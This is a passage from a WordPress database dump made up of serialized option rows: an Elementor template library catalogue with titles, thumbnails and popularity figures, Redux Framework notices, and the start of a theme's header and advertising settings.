Company\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-services.png\";s:12:\"tmpl_created\";s:10:\"1499774119\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"86\";s:16:\"popularity_index\";s:2:\"97\";s:11:\"trend_index\";s:2:\"96\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:85;a:12:{s:2:\"id\";s:3:\"823\";s:5:\"title\";s:19:\"Pricing &#8211; App\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-app.jpg\";s:12:\"tmpl_created\";s:10:\"1485272966\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/pricing-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"87\";s:16:\"popularity_index\";s:2:\"63\";s:11:\"trend_index\";s:2:\"81\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:86;a:12:{s:2:\"id\";s:3:\"824\";s:5:\"title\";s:24:\"Pricing &#8211; Software\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-software.png\";s:12:\"tmpl_created\";s:10:\"1485272900\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/pricing-software-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"88\";s:16:\"popularity_index\";s:2:\"72\";s:11:\"trend_index\";s:2:\"92\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:87;a:12:{s:2:\"id\";s:3:\"825\";s:5:\"title\";s:24:\"Product &#8211; Speakers\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/01/product-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485272513\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/product-speakers/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"89\";s:16:\"popularity_index\";s:2:\"67\";s:11:\"trend_index\";s:3:\"109\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:88;a:12:{s:2:\"id\";s:3:\"245\";s:5:\"title\";s:21:\"Product &#8211; Clean\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0020.png\";s:12:\"tmpl_created\";s:10:\"1470829876\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/product-clean/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"90\";s:16:\"popularity_index\";s:2:\"29\";s:11:\"trend_index\";s:2:\"35\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:89;a:12:{s:2:\"id\";s:3:\"150\";s:5:\"title\";s:19:\"Product &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0003.png\";s:12:\"tmpl_created\";s:10:\"1470829879\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/product-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"91\";s:16:\"popularity_index\";s:2:\"15\";s:11:\"trend_index\";s:2:\"17\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:90;a:12:{s:2:\"id\";s:3:\"751\";s:5:\"title\";s:25:\"Homepage &#8211; Interior\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-home.png\";s:12:\"tmpl_created\";s:10:\"1485269743\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"92\";s:16:\"popularity_index\";s:2:\"55\";s:11:\"trend_index\";s:2:\"76\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:91;a:12:{s:2:\"id\";s:3:\"753\";s:5:\"title\";s:22:\"About &#8211; Interior\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-About.png\";s:12:\"tmpl_created\";s:10:\"1485269710\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"93\";s:16:\"popularity_index\";s:2:\"70\";s:11:\"trend_index\";s:3:\"101\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:92;a:12:{s:2:\"id\";s:3:\"754\";s:5:\"title\";s:25:\"Services &#8211; Interior\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-Services.png\";s:12:\"tmpl_created\";s:10:\"1485269691\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/services-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"94\";s:16:\"popularity_index\";s:2:\"78\";s:11:\"trend_index\";s:3:\"106\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:93;a:12:{s:2:\"id\";s:3:\"752\";s:5:\"title\";s:24:\"Contact &#8211; Interior\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-contact.png\";s:12:\"tmpl_created\";s:10:\"1485269737\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/contact-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"95\";s:16:\"popularity_index\";s:2:\"71\";s:11:\"trend_index\";s:3:\"100\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:94;a:12:{s:2:\"id\";s:4:\"1075\";s:5:\"title\";s:19:\"Shop &#8211; Sweets\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2017/03/Sweets.png\";s:12:\"tmpl_created\";s:10:\"1488810871\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/shop-sweets/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"96\";s:16:\"popularity_index\";s:2:\"31\";s:11:\"trend_index\";s:2:\"31\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:95;a:12:{s:2:\"id\";s:4:\"1051\";s:5:\"title\";s:24:\"Blog Post &#8211; Launch\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/post-cloud.png\";s:12:\"tmpl_created\";s:10:\"1488810869\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blog-post-launch/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"97\";s:16:\"popularity_index\";s:2:\"23\";s:11:\"trend_index\";s:2:\"25\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:96;a:12:{s:2:\"id\";s:4:\"1245\";s:5:\"title\";s:13:\"Coming Soon 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-1.png\";s:12:\"tmpl_created\";s:10:\"1491207184\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"98\";s:16:\"popularity_index\";s:2:\"69\";s:11:\"trend_index\";s:3:\"105\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:97;a:12:{s:2:\"id\";s:4:\"1247\";s:5:\"title\";s:13:\"Coming Soon 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-2.png\";s:12:\"tmpl_created\";s:10:\"1491207138\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"99\";s:16:\"popularity_index\";s:2:\"28\";s:11:\"trend_index\";s:2:\"21\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:98;a:12:{s:2:\"id\";s:4:\"1248\";s:5:\"title\";s:13:\"Coming Soon 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-3.png\";s:12:\"tmpl_created\";s:10:\"1491207050\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"100\";s:16:\"popularity_index\";s:2:\"84\";s:11:\"trend_index\";s:2:\"59\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:99;a:12:{s:2:\"id\";s:4:\"1249\";s:5:\"title\";s:13:\"Coming Soon 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-4.png\";s:12:\"tmpl_created\";s:10:\"1491207380\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"101\";s:16:\"popularity_index\";s:3:\"106\";s:11:\"trend_index\";s:3:\"112\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:100;a:12:{s:2:\"id\";s:4:\"1250\";s:5:\"title\";s:13:\"Coming Soon 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-5.png\";s:12:\"tmpl_created\";s:10:\"1491207450\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"102\";s:16:\"popularity_index\";s:2:\"33\";s:11:\"trend_index\";s:2:\"37\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:101;a:12:{s:2:\"id\";s:4:\"1260\";s:5:\"title\";s:13:\"Coming Soon 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-6.png\";s:12:\"tmpl_created\";s:10:\"1491207507\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"103\";s:16:\"popularity_index\";s:3:\"100\";s:11:\"trend_index\";s:3:\"121\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:102;a:12:{s:2:\"id\";s:4:\"1261\";s:5:\"title\";s:13:\"Coming Soon 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/04/Coming-Soon-7.png\";s:12:\"tmpl_created\";s:10:\"1491207584\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"104\";s:16:\"popularity_index\";s:2:\"34\";s:11:\"trend_index\";s:2:\"29\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:103;a:12:{s:2:\"id\";s:4:\"1272\";s:5:\"title\";s:13:\"Coming Soon 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-8.png\";s:12:\"tmpl_created\";s:10:\"1491207674\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"105\";s:16:\"popularity_index\";s:2:\"58\";s:11:\"trend_index\";s:3:\"103\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:104;a:12:{s:2:\"id\";s:4:\"1279\";s:5:\"title\";s:13:\"Coming Soon 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-9.png\";s:12:\"tmpl_created\";s:10:\"1491207756\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"106\";s:16:\"popularity_index\";s:2:\"39\";s:11:\"trend_index\";s:2:\"46\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:105;a:12:{s:2:\"id\";s:4:\"1745\";s:5:\"title\";s:14:\"Coming Soon 10\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-002.png\";s:12:\"tmpl_created\";s:10:\"1494849745\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/coming-soon-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"107\";s:16:\"popularity_index\";s:2:\"64\";s:11:\"trend_index\";s:2:\"71\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:106;a:12:{s:2:\"id\";s:4:\"1742\";s:5:\"title\";s:12:\"Login Page 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-003.png\";s:12:\"tmpl_created\";s:10:\"1494849744\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:100:\"https://library.elementor.com/login-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"108\";s:16:\"popularity_index\";s:2:\"92\";s:11:\"trend_index\";s:3:\"122\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:107;a:12:{s:2:\"id\";s:4:\"1748\";s:5:\"title\";s:12:\"Login Page 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-001.png\";s:12:\"tmpl_created\";s:10:\"1494849742\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/login-page-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"109\";s:16:\"popularity_index\";s:2:\"59\";s:11:\"trend_index\";s:2:\"86\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:108;a:12:{s:2:\"id\";s:4:\"2080\";s:5:\"title\";s:27:\"Ski Resort &#8211; Homepage\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1508161124\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"110\";s:16:\"popularity_index\";s:3:\"103\";s:11:\"trend_index\";s:2:\"62\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:109;a:12:{s:2:\"id\";s:4:\"2088\";s:5:\"title\";s:24:\"Ski Resort &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-About.png\";s:12:\"tmpl_created\";s:10:\"1508161129\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/ski-resort-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"111\";s:16:\"popularity_index\";s:3:\"122\";s:11:\"trend_index\";s:3:\"108\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:110;a:12:{s:2:\"id\";s:4:\"2085\";s:5:\"title\";s:27:\"Ski Resort &#8211; Services\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Services.png\";s:12:\"tmpl_created\";s:10:\"1508161134\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"112\";s:16:\"popularity_index\";s:3:\"124\";s:11:\"trend_index\";s:3:\"113\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:111;a:12:{s:2:\"id\";s:4:\"2462\";s:5:\"title\";s:19:\"Architect – About\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/architect-–-about.png\";s:12:\"tmpl_created\";s:10:\"1508243317\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/architect-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"113\";s:16:\"popularity_index\";s:3:\"118\";s:11:\"trend_index\";s:3:\"111\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:112;a:12:{s:2:\"id\";s:4:\"2362\";s:5:\"title\";s:26:\"Architect &#8211; Projects\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2017/10/Architect-Projects.png\";s:12:\"tmpl_created\";s:10:\"1508243335\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/architect-projects/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"114\";s:16:\"popularity_index\";s:3:\"120\";s:11:\"trend_index\";s:2:\"94\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:113;a:12:{s:2:\"id\";s:3:\"614\";s:5:\"title\";s:25:\"Architect &#8211; Contact\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2016/12/architect-contact.jpg\";s:12:\"tmpl_created\";s:10:\"1481549169\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/architect-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"115\";s:16:\"popularity_index\";s:2:\"44\";s:11:\"trend_index\";s:2:\"72\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:114;a:12:{s:2:\"id\";s:4:\"2126\";s:5:\"title\";s:37:\"Construction Company &#8211; Homepage\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1508325849\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/construction-company-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"116\";s:16:\"popularity_index\";s:2:\"96\";s:11:\"trend_index\";s:2:\"61\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:115;a:12:{s:2:\"id\";s:4:\"2129\";s:5:\"title\";s:34:\"Construction Company &#8211; About\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-About.png\";s:12:\"tmpl_created\";s:10:\"1508325881\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/construction-company-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"117\";s:16:\"popularity_index\";s:3:\"113\";s:11:\"trend_index\";s:2:\"77\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:116;a:12:{s:2:\"id\";s:4:\"2135\";s:5:\"title\";s:36:\"Construction Company &#8211; Contact\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Contact.png\";s:12:\"tmpl_created\";s:10:\"1508325922\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/construction-company-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"118\";s:16:\"popularity_index\";s:3:\"115\";s:11:\"trend_index\";s:2:\"58\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:117;a:12:{s:2:\"id\";s:4:\"2094\";s:5:\"title\";s:28:\"Plants Shop &#8211; Homepage\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-Home.png\";s:12:\"tmpl_created\";s:10:\"1509621053\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/plants-shop-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"119\";s:16:\"popularity_index\";s:3:\"116\";s:11:\"trend_index\";s:3:\"102\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:118;a:12:{s:2:\"id\";s:4:\"2120\";s:5:\"title\";s:25:\"Plants Shop &#8211; About\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-About.png\";s:12:\"tmpl_created\";s:10:\"1509631820\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/plants-shop-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"120\";s:16:\"popularity_index\";s:3:\"117\";s:11:\"trend_index\";s:3:\"114\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:119;a:12:{s:2:\"id\";s:4:\"3153\";s:5:\"title\";s:14:\"Halloween Pack\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/10/halloween.png\";s:12:\"tmpl_created\";s:10:\"1508950132\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/halloween-pack/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"121\";s:16:\"popularity_index\";s:3:\"109\";s:11:\"trend_index\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:120;a:12:{s:2:\"id\";s:4:\"3338\";s:5:\"title\";s:34:\"Black Friday &#8211; Nature Set​\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-1.png\";s:12:\"tmpl_created\";s:10:\"1511203351\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-nature-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"122\";s:16:\"popularity_index\";s:3:\"110\";s:11:\"trend_index\";s:3:\"115\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:121;a:12:{s:2:\"id\";s:4:\"3339\";s:5:\"title\";s:35:\"Black Friday &#8211; Pop-Styled Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-2.png\";s:12:\"tmpl_created\";s:10:\"1511203636\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/black-friday-pop-styled-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"123\";s:16:\"popularity_index\";s:2:\"93\";s:11:\"trend_index\";s:2:\"68\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:122;a:12:{s:2:\"id\";s:4:\"3335\";s:5:\"title\";s:31:\"Black Friday &#8211; Retail Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-4.png\";s:12:\"tmpl_created\";s:10:\"1511203246\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-retail-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"124\";s:16:\"popularity_index\";s:3:\"107\";s:11:\"trend_index\";s:2:\"97\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:123;a:12:{s:2:\"id\";s:4:\"3340\";s:5:\"title\";s:41:\"Black Friday &#8211; Software Product Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-3.png\";s:12:\"tmpl_created\";s:10:\"1511203713\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/black-friday-software-product-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"125\";s:16:\"popularity_index\";s:3:\"105\";s:11:\"trend_index\";s:3:\"116\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:124;a:12:{s:2:\"id\";s:3:\"420\";s:5:\"title\";s:11:\"Hero UI Kit\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/09/library-ui-kit-cover.png\";s:12:\"tmpl_created\";s:10:\"1475067229\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/hero-ui-kit/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"126\";s:16:\"popularity_index\";s:1:\"8\";s:11:\"trend_index\";s:1:\"7\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}}','no'),(168,'ReduxFrameworkPlugin_ACTIVATED_NOTICES','a:1:{i:0;s:138:\"Redux Framework has an embedded demo. <a href=\"./plugins.php?ReduxFrameworkPlugin=demo\">Click here to activate the sample config file.</a>\";}','yes'),(169,'redux_version_upgraded_from','3.6.7.7','yes'),(170,'_transient_timeout__redux_activation_redirect','1512726065','no'),(171,'_transient__redux_activation_redirect','1','no'),(173,'magzma_framework','a:49:{s:8:\"last_tab\";s:1:\"1\";s:11:\"header_type\";s:7:\"default\";s:11:\"menu_select\";a:2:{s:7:\"use-top\";s:1:\"1\";s:8:\"use-main\";s:1:\"1\";}s:13:\"head_ads_type\";s:12:\"head_ads_img\";s:14:\"head_ads_image\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:13:\"head_ads_link\";s:0:\"\";s:19:\"head_ads_javascript\";s:0:\"\";s:16:\"topcont_ads_type\";s:15:\"topcont_ads_img\";s:17:\"topcont_ads_image\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:16:\"topcont_ads_link\";s:0:\"\";s:22:\"topcont_ads_javascript\";s:0:\"\";s:16:\"botcont_ads_type\";s:15:\"botcont_ads_img\";s:17:\"botcont_ads_image\";a:5:{s:3:\"